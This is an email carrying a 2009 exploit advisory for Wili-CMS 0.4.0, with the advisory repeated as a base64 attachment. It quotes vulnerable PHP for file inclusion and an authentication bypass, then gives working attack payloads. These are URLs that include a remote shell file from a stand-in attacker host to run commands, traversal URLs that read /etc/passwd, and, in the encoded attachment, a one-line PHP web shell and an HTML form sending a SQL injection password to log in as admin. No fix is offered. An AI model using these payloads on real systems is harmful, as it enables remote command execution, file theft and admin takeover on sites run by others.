--001636c5b2f080c3b7046472185b
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
******* Salvatore "drosophila" Fresta *******
[+] Application: Wili-CMS
[+] Version: 0.4.0
[+] Website: http://wili-cms.sourceforge.net/
[+] Bugs: [A] Multiple Remote/Local File Inclusion
[B] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 06 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple Remote/Local File Inclusion
[-] Requisites: none
[-] File affected: index.php
This bug allows a guest to include remote and
local files and however to exec remote commands.
...
if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
include( $globals['content_dir'].$globals['template_dir']."error404.php" );
}
...
include( template_file( $globals['root_template'] ) );
- [B] Authentication Bypass
[-] Requisites: magic_quotes_gpc = off
[-] File affected: lib/admin/init_session.php
This bug allows a guest to login as admin.
...
$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password']
: $_SESSION['password'];
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ?
$_REQUEST['uname'] : $_SESSION['uname'];
...
$sth = mysql_query(
"SELECT id
FROM ".$globals['userstable']."
WHERE username='".$_SESSION['uname']."'
AND adminflag=1
AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );
// password ok -> login
if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
$globals['user'] = mysql_result( $userh = mysql_query( "SELECT id,
skipwelcome FROM ".$globals['userstable']." WHERE
username='".$globals['username']."'", $globals['dbh'] ),0,0);
if ( $globals['admin_modus'] == "loggedin" ) {
// log login
db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );
// goto welcome page if skipwelcome flag of this user is not set
if ( !(mysql_result( $userh, 0, 1 )) ) {
$_REQUEST['npage'] = get_firstpage( "adminwelcome" );
}
$globals['admin_modus'] = "";
}
...
*************************************************
[+] Code
- [A] Multiple Remote/Local File Inclusion
shell.txt:
http://www.site.com/path/?npage=-1&content_dir=http://www.evilsite.com/shell.txt%00&cmd=ls
http://www.site.com/path/?npage=1&content_dir=http://www.evilsite.com/shell.txt%00&cmd=ls
http://www.site.com/path/?npage=-1&content_dir=../../../../etc/passwd%00
http://www.site.com/path/?npage=1&content_dir=../../../../etc/passwd%00
- [B] Authentication Bypass
Wili-CMS 0.4.0 Authentication Bypass Exploit
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
--001636c5b2f080c3b7046472185b
Content-Type: text/plain; charset=US-ASCII;
name="Wili-CMS 0.4.0 Multiple Vulnerabilities-06032009.txt"
Content-Disposition: attachment;
filename="Wili-CMS 0.4.0 Multiple Vulnerabilities-06032009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_frytk6mg0
KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBXaWxpLUNNUwpbK10gVmVyc2lvbjogMC40LjAKWytdIFdlYnNpdGU6IGh0dHA6
Ly93aWxpLWNtcy5zb3VyY2Vmb3JnZS5uZXQvCgpbK10gQnVnczogW0FdIE11bHRpcGxlIFJlbW90
ZS9Mb2NhbCBGaWxlIEluY2x1c2lvbgogICAgICAgICAgW0JdIEF1dGhlbnRpY2F0aW9uIEJ5cGFz
cwoKWytdIEV4cGxvaXRhdGlvbjogUmVtb3RlClsrXSBEYXRlOiAwNiBNYXIgMjAwOQoKWytdIERp
c2NvdmVyZWQgYnk6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBBdXRob3I6IFNh
bHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBDb250YWN0OiBlLW1haWw6IGRyb3NvcGhp
bGF4eHhAZ21haWwuY29tCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKgoKWytdIE1lbnUKCjEpIEJ1Z3MKMikgQ29kZQozKSBGaXgKCgoqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gQnVncwoKCi0gW0Fd
IE11bHRpcGxlIFJlbW90ZS9Mb2NhbCBGaWxlIEluY2x1c2lvbgoKWy1dIFJlcXVpc2l0ZXM6IG5v
bmUKWy1dIEZpbGUgYWZmZWN0ZWQ6IGluZGV4LnBocAoKVGhpcyBidWcgYWxsb3dzIGEgZ3Vlc3Qg
dG8gaW5jbHVkZSByZW1vdGUgYW5kCmxvY2FsIGZpbGVzIGFuZCBob3dldmVyIHRvIGV4ZWMgcmVt
b3RlIGNvbW1hbmRzLgoKLi4uCgppZiAoICRnbG9iYWxzWydkYmgnXSAmJiAhcGFnZUV4aXN0cygg
JGdsb2JhbHNbJ3BhZ2VpZCddWydwaWQnXSApICkgewogICAgaW5jbHVkZSggJGdsb2JhbHNbJ2Nv
bnRlbnRfZGlyJ10uJGdsb2JhbHNbJ3RlbXBsYXRlX2RpciddLiJlcnJvcjQwNC5waHAiICk7Cn0K
ICAKLi4uCgppbmNsdWRlKCB0ZW1wbGF0ZV9maWxlKCAkZ2xvYmFsc1sncm9vdF90ZW1wbGF0ZSdd
ICkgKTsKCgotIFtCXSBBdXRoZW50aWNhdGlvbiBCeXBhc3MKClstXSBSZXF1aXNpdGVzOiBtYWdp
Y19xdW90ZXNfZ3BjID0gb2ZmClstXSBGaWxlIGFmZmVjdGVkOiBsaWIvYWRtaW4vaW5pdF9zZXNz
aW9uLnBocAoKVGhpcyBidWcgYWxsb3dzIGEgZ3Vlc3QgdG8gbG9naW4gYXMgYWRtaW4uCgouLi4K
CiRfU0VTU0lPTlsncGFzc3dvcmQnXSA9ICRfUkVRVUVTVFsncGFzc3dvcmQnXSA/ICRfUkVRVUVT
VFsncGFzc3dvcmQnXSA6ICRfU0VTU0lPTlsncGFzc3dvcmQnXTsKJGdsb2JhbHNbJ3VzZXJuYW1l
J10gPSAkX1NFU1NJT05bJ3VuYW1lJ10gPSAkX1JFUVVFU1RbJ3VuYW1lJ10gPyAkX1JFUVVFU1Rb
J3VuYW1lJ10gOiAkX1NFU1NJT05bJ3VuYW1lJ107CiAgCi4uLgoKJHN0aCA9IG15c3FsX3F1ZXJ5
KCAKICAgICAgICJTRUxFQ1QgaWQgCiAgICAgICAgRlJPTSAiLiRnbG9iYWxzWyd1c2Vyc3RhYmxl
J10uIgogICAgICAgIFdIRVJFIHVzZXJuYW1lPSciLiRfU0VTU0lPTlsndW5hbWUnXS4iJyAKICAg
ICAgICBBTkQgYWRtaW5mbGFnPTEgCiAgICAgICAgQU5EIHBhc3N3b3JkPVBBU1NXT1JEKCciLiRf
U0VTU0lPTlsncGFzc3dvcmQnXS4iJykiLCAkZ2xvYmFsc1snZGJoJ10gKTsKICAKICAgICAgLy8g
cGFzc3dvcmQgb2sgLT4gbG9naW4gICAgCmlmICggbXlzcWxfbnVtX3Jvd3MoICRzdGggKSAmJiAo
ICRnbG9iYWxzWyd1aWQnXSA9IG15c3FsX3Jlc3VsdCgkc3RoLDApICkgKSB7CgkkZ2xvYmFsc1sn
dXNlciddID0gbXlzcWxfcmVzdWx0KCAkdXNlcmggPSBteXNxbF9xdWVyeSggIlNFTEVDVCBpZCwg
c2tpcHdlbGNvbWUgRlJPTSAiLiRnbG9iYWxzWyd1c2Vyc3RhYmxlJ10uIiBXSEVSRSB1c2VybmFt
ZT0nIi4kZ2xvYmFsc1sndXNlcm5hbWUnXS4iJyIsICRnbG9iYWxzWydkYmgnXSApLDAsMCk7CiAg
ICAKICAgIGlmICggJGdsb2JhbHNbJ2FkbWluX21vZHVzJ10gPT0gImxvZ2dlZGluIiApIHsgIAog
ICAgICAgICAvLyBsb2cgbG9naW4KICAgICAgICAgZGJfYWRkbG9nKCAiTG9nZ2VkIGluIGZyb20g
Ii5nZXRlbnYoIlJFTU9URV9BRERSIikgKTsgICAgICAgICAKICAgICAgICAgLy8gZ290byB3ZWxj
b21lIHBhZ2UgaWYgc2tpcHdlbGNvbWUgZmxhZyBvZiB0aGlzIHVzZXIgaXMgbm90IHNldAogICAg
ICAgICBpZiAoICEobXlzcWxfcmVzdWx0KCAkdXNlcmgsIDAsIDEgKSkgKSB7CiAgICAgICAgICAg
JF9SRVFVRVNUWyducGFnZSddID0gZ2V0X2ZpcnN0cGFnZSggImFkbWlud2VsY29tZSIgKTsKICAg
ICAgICAgfQogICAgICAgICAkZ2xvYmFsc1snYWRtaW5fbW9kdXMnXSA9ICIiOwogICAgfQogICAg
CiAgICAuLi4KCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqCgpbK10gQ29kZQoKCi0gW0FdIE11bHRpcGxlIFJlbW90ZS9Mb2NhbCBGaWxlIEluY2x1c2lv
bgoKc2hlbGwudHh0OiA8P3BocCBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4KCmh0dHA6Ly93d3cu
c2l0ZS5jb20vcGF0aC8/bnBhZ2U9LTEmY29udGVudF9kaXI9aHR0cDovL3d3dy5ldmlsc2l0ZS5j
b20vc2hlbGwudHh0JTAwJmNtZD1scwpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvP25wYWdlPTEm
Y29udGVudF9kaXI9aHR0cDovL3d3dy5ldmlsc2l0ZS5jb20vc2hlbGwudHh0JTAwJmNtZD1scwoK
aHR0cDovL3d3dy5zaXRlLmNvbS9wYXRoLz9ucGFnZT0tMSZjb250ZW50X2Rpcj0uLi8uLi8uLi8u
Li9ldGMvcGFzc3dkJTAwCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC8/bnBhZ2U9MSZjb250ZW50
X2Rpcj0uLi8uLi8uLi8uLi9ldGMvcGFzc3dkJTAwCgoKLSBbQl0gQXV0aGVudGljYXRpb24gQnlw
YXNzCgo8aHRtbD4KICA8aGVhZD4KICAgIDx0aXRsZT5XaWxpLUNNUyAwLjQuMCBBdXRoZW50aWNh
dGlvbiBCeXBhc3MgRXhwbG9pdDwvdGl0bGU+CiAgPC9oZWFkPgogIDxib2R5PgogICAgPGZvcm0g
YWN0aW9uPSJodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvYWRtaW4ucGhwIiBtZXRob2Q9IlBPU1Qi
PgogICAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idW5hbWUiIHZhbHVlPSJhZG1pbiI+CiAg
ICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3N3b3JkIiB2YWx1ZT0iMScpIFVOSU9O
IEFMTCBTRUxFQ1QgMSMiPgogICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJtb2RlIiB2
YWx1ZT0ibG9nZ2VkaW4iPgogICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJucGFnZSIg
dmFsdWU9IjEiPgogICAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhwbG9pdCI+CiAg
ICA8L2Zvcm0+CiAgPC9ib2R5Pgo8L2h0bWw+CgoKKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio--001636c5b2f080c3b7046472185b--